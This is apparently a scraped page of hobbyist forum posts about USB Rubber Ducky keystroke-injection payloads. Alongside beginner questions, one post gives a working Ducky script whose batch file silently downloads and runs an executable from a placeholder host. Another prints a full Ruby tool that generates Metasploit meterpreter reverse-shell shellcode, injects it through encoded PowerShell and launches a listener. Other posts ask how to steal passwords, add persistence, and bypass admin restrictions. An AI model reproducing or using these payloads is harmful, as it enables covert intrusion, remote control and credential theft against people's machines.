Search the Community

Hello I recently purchased a USB Rubber Ducky and I soon flashed it with twin duck. I then a script on the SD card and plug it in to test the payload. The ducky is just flashing from Green to red countinously. A little help would be great. Thank you, Cassetti

I got a ducky for X-Mas so im trying to learn how to code duckyscript which is going to take awhile since i have never coded anything before (could also use a link to the most obvious guide ever i am having a bit of a hard time picking it up ) but my question is while i learn is there any where else i can get premade payloads i have the github payload links would like any links possible but preferably pent-testing ones thanks!

Hey there Hak5 community and fellow Rubber Ducky users! I'm a MacOS user and a beginner when it comes to coding, but I came up with a little bash script to help speed up the encoding process. It's nothing fancy. When I was writing a payload and having to encode then replace the file on the microSD and all that - it was getting a bit tedious. I call it duck_it. It basically takes your scripts as .txt files, encodes them, and transfers them to your microSD card and ejects the card. https://github.com/dot-iso/duck_it I'm new to Bash and GitHub, so there may be some n00b stuff. I'm sure there's a lot of room for improvement

So I got a rubber ducky 4 days ago and I been looking at all the YouTube videos but none them explain it well they all go straight to coding instead telling me what to download and what tools I need. I want to be able to steal passwords etc the computer login pass I saw that on YouTube. The is one when you can do a RAT? To control someone screen or view ther file. The also one where it saves passwords and emails it to yourself. Just want to be able to complete something that actually works not the 'hello world'. Like this script (what does it do and how can I make it work) https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload-Netcat-Reverse-Shell I really want to try this one too https://www.hak5.org/blog/15-second-password-hack-mr-robot-style So yeah just need help with it like step by step what I need to install or setup!

So I recently bought the usb rubber ducky thinking that it would be as simple as copy and pasting a script onto it like a usb drive then inserting it, but it turns out that I have no idea what I'm doing. I've tried tutorials online but they're just not making much sense to me. Thanks for helping out!

Hi Guys, Hola Chicos Without long introductions, I'm a big fan of Rubber Ducky, BadUSB techniques, Automation stuff, etc.. Long time ago i was working hard to get the ideal cross-platform payload which works: 1. Cross-OSes 2. Cross-keyboard layouts (not all of them currently) As we all know in a the rubber ducky dual mode (Keyboard + Mass storage) we can't *that easy* to get the drive letter dynamically and all you have to do to execute this command line: for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d This command line loops the current drives letters and finds the one which have the name "DUCKY" then assigns the variable "duck" to its drive letter, after that the %duck% variable will always be pointing to the USB Rubber Ducky drive letter. Cool! Simulating and Writing this command line on some OSes keyboard layouts is a big HEADACHE, Writing (', |, ", ^, etc..) is an Ughhhh a big mess, I wished that USB Rubber Ducky had a copy paste from any source but what we can do, it is a keyboard and we are functionally limited here! Spanish guys know about the big headache of pressing "AltGr" key to get some symbols like @#^ and the only way to simulate this is by modifying the kb layout and add some ascii codes and stuff then rewriting the ducky script etc.. so this topic is for you guys to jump over it, Cheers! The Windows part (Win 8.1 Eng & Win 7 Esp) So i came up with an idea (a tiny but cool one) that allowed me to execute one payload on both Windows 8.1 English UI/Kb Layout and Windows 7 Español UI/Kb Layout and for an extra fun I added some codes to achieve the same on macOS Sierra (a cool way to execute something from Ducky mass storage without the headache of the drive letter and later i will explain why), Here we go: DEFAULT_DELAY 75 DELAY 1000 WINDOWS r DELAY 1000 STRING cmd ENTER DELAY 1000 STRING for %p in DELAY 10 SHIFT 8 STRING A B C D E F G H I J K L M N DELAY 100 STRING O P Q R S T U V W X Y Z DELAY 10 SHIFT 9 DELAY 100 STRING do %p DELAY 10 SHIFT . SHIFT 7 STRING r.bat ENTER DELAY 100 STRING for %p in DELAY 100 STRING (A B C D E F G H I J K L M N DELAY 100 STRING O P Q R S T U V W X Y Z) DELAY 100 STRING do %p:/r.bat ENTER You guys don't need me for sure to explain each step but i will only explain the highlights: 1. I'm looping (in a hard coded way) all the drive letters connected to the machine to find our ONE and execute ANYTHING from a stored .bat file (possibilities are endless here to do what you want) 2. The loop mentioned above is executed twice, First on a Spanish (latin) keyboard layout and you can notice that when i used the "SHIFT 8" key combinations to simulate "(" and "SHIFT 9" to simulate ")" to achieve the command line: for %p in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z)do %p:/symbiansymoh.bat So, a "for" loop to execute a bat file and this loop will be executed twice (one time for english kb layout and the other is for the spanish kb layout) You can put anything inside this symbiansymoh.bat file but for satisfying your curiosity guys here's my content: @echo off color 10 REM Getting our drive letter which have the name SYMB assign to symb for /f %%d in ('wmic volume get driveletter^, label ^| findstr "SYMB"')do set symb=%%d REM Copy a NOTmalicious file to the temp folder copy %symb%\Executables\NOTmalicious.jpg %tmp%\NOTmalicious.jar /y REM Executing the NOTmalicious file start %tmp%\NOTmalicious.jar REM Downloading and executing another NOTmalicious file powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('https://www.BlahBlahBlah.com/Whatever.exe','%TEMP%\Whatever.exe'); Start-Process "%TEMP%\Whatever.exe" REM Goodbye exit It doesn't matter now what language the machine you're executing the bat file on. The macOS part (English KB Layout) The macOS part is the best and a kind of no brainer here, As you may know Linux, Unix and Linux/Unix-like OSes uses and identifies USB storages by its NAME not LETTER (There's nothing called letters in this beautiful and lovely world) So sending the key combinations to fire the spotlight search then opening the terminal is so freaking easy, then navigating to "/Volumes/[DRIVE_NAME]/", Giving the bash file "symbiansymoh.sh" the executing priveleges (Chmod +X) then executing it which also do ANYTHING from a stored .sh file (possibilities are endless here to do what you want) << copy paste DEFAULT_DELAY 75 DELAY 1000 GUI SPACE DELAY 500 STRING terminal DELAY 100 ENTER DELAY 500 STRING chmod +X /Volumes/SYMB/symbiansymoh.sh ENTER DELAY 100 STRING nohup sh /Volumes/SYMB/symbioansymoh.sh &>/dev/null & ENTER DELAY 100 GUI q DELAY 300 ENTER And again for feeding your curiosity here's the content of my symbiansymoh.sh file: #!/bin/bash rm -r /tmp/NOTmalicious.app; cp -R /Volumes/SYMB/NOTmalicious /tmp/NOTmalicious.app; open /tmp/NOTmalicious.app; that copies a stored NOTmalicious.app file to the temp folder then executes it. Here's a PoC video demonstrates the blah blah blah above: https://www.youtube.com/watch?v=YHzcI42dFOI The topic is open to discussion, Any ideas, modification is always welcome! Cheers and have a great weekend guys!

I am running VMware Fusion on a Mac with a Windows 7 guest. My goal is to run the Invoke-Mimikatz payload for credential pilfering, which involves sending WIN-R (GUI R) to the Windows OS. However, because Windows 7 is running as a guest VM, the Windows OS doesn't actually see the ducky connect as a USB keyboard. The ducky connects to the host OS (Mac OSX) instead. When the script sends a 'GUI R', this doesn't seem to get passed to the guest VM (Windows), even if the focus is on the VM at the time. However, if I write a basic script that simply sends a 'STRING Hello World' and 'ENTER', then I see these characters appear, if I first open notepad to give it something to type into. Has anyone tried something like this before, or does anyone have an idea how to go about addressing this?

is it possible to create a powershell reverse tcp dns payload for badusb if so please guide me through it

Hey Everyone! Most of the prank-payloads didn't work for some reason I fixed most of them and made a video for you guys! Check it out

Hey fellas i came across this reverse shell made by (James Cook @b00stfr3ak44) i was just curous how can i change this to a Persistence reverse shell , its currenty a .rb file. you execute it in terminal , but i would like to know how to change it. #!/usr/bin/env ruby # Thanks to @mattifestation exploit-monday.com and Dave Kennedy. # Written by James Cook @b00stfr3ak44 require 'base64' require 'readline' def print_error(text) print "\e[31m[-]\e[0m #{text}" end def print_success(text) print "\e[32m[+]\e[0m #{text}" end def print_info(text) print "\e[34m[*]\e[0m #{text}" end def get_input(text) print "\e[33m[!]\e[0m #{text}" end def rgets(prompt = '', default = '') choice = Readline.readline(prompt, false) choice == default if choice == '' choice end def select_host host_name = rgets('Enter the host ip to listen on: ') ip = host_name.split('.') if ip[0] == nil? || ip[1] == nil? || ip[2] == nil? || ip[3] == nil? print_error("Not a valid IP\n") select_host end print_success("Using #{host_name} as server\n") host_name end def select_port port = rgets('Port you would like to use or leave blank for [443]: ') if port == '' port = '443' print_success("Using #{port}\n") return port elsif !(1..65_535).cover?(port.to_i) print_error("Not a valid port\n") sleep(1) select_port else print_success("Using #{port}\n") return port end end def shellcode_gen(msf_path, host, port) print_info("Generating shellcode\n") msf_command = "#{msf_path}./msfvenom --payload " msf_command << "#{@set_payload} LHOST=#{host} LPORT=#{port} -f c" execute = `#{msf_command}` shellcode = clean_shellcode(execute) powershell_command = powershell_string(shellcode) final = to_ps_base64(powershell_command) final end def clean_shellcode(shellcode) shellcode = shellcode.gsub('\\', ',0') shellcode = shellcode.delete('+') shellcode = shellcode.delete('"') shellcode = shellcode.delete("\n") shellcode = shellcode.delete("\s") shellcode[0..18] = '' shellcode end def to_ps_base64(command) Base64.encode64(command.split('').join("\x00") << "\x00").gsub!("\n", '') end def powershell_string(shellcode) s = %($1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr ) s << 'VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, ' s << "uint flProtect);[DllImport(\"kernel32.dll\")]public static extern " s << 'IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, ' s << 'IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, ' s << "IntPtr lpThreadId);[DllImport(\"msvcrt.dll\")]public static extern " s << "IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type " s << %(-memberDefinition $c -Name "Win32" -namespace Win32Functions ) s << "-passthru;[byte[]];[byte[]]$sc = #{shellcode};$size = 0x1000;if " s << '($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::' s << 'VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);' s << '$i++) {$w::memset([intPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::' s << "CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = " s << '[system.Convert]::ToBase64String([system.Text.Encoding]::Unicode.' s << 'GetBytes($1));if([intPtr]::Size -eq 8){$x86 = $env:SystemRoot + ' s << %("\\syswow64\\WindowsPowerShell\\v1.0\\powershell";$cmd = "-nop -noni ) s << %(-enc";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& ) s << %(powershell $cmd $gq";}) end def ducky_setup(encoded_command) print_info("Writing to file\n") s = "DELAY 2000\nGUI r\nDELAY 500\nSTRING cmd\nENTER\nDELAY 500\n" s << "STRING powershell -nop -wind hidden -noni -enc #{encoded_command}\n" s << 'ENTER' File.open('powershell_reverse_ducky.txt', 'w') do |f| f.write(s) end print_success("File Complete\n") end def metasploit_setup(msf_path, host, port) print_info("Setting up Metasploit this may take a moment\n") rc_file = 'msf_listener.rc' file = File.open("#{rc_file}", 'w') file.write("use exploit/multi/handler\n") file.write("set PAYLOAD #{@set_payload}\n") file.write("set LHOST #{host}\n") file.write("set LPORT #{port}\n") file.write("set EnableStageEncoding true\n") file.write("set ExitOnSession false\n") file.write('exploit -j') file.close system("#{msf_path}./msfconsole -r #{rc_file}") end begin if File.exist?('/usr/bin/msfvenom') msf_path = '/usr/bin/' elsif File.exist?('/opt/metasploit-framework/msfvenom') msf_path = ('/opt/metasploit-framework/') else print_error('Metasploit Not Found!') exit end @set_payload = 'windows/meterpreter/reverse_tcp' host = select_host port = select_port encoded_command = shellcode_gen(msf_path, host, port) ducky_setup(encoded_command) msf_setup = rgets('Would you like to start the listener?[yes/no] ') print_info("Compile powershell_reverse_ducky.txt with duckencode.jar\n") metasploit_setup(msf_path, host, port) if msf_setup == 'yes' print_info("Good Bye!\n") end

hello, I was wondering if it was possible to place items in Windows 7 Startup folder without administrator rights. I have a user account to log in, but no admin rights. I have ordered a Ducky and was wondering if it would help me achieve that. I am open to all options, with or without the Ducky. Booting form USB or CD is not an option. Admin password is required to change the boot sequence. The Utilman.exe attack has been patched in this 64-Bit Windows 7 Enterprise.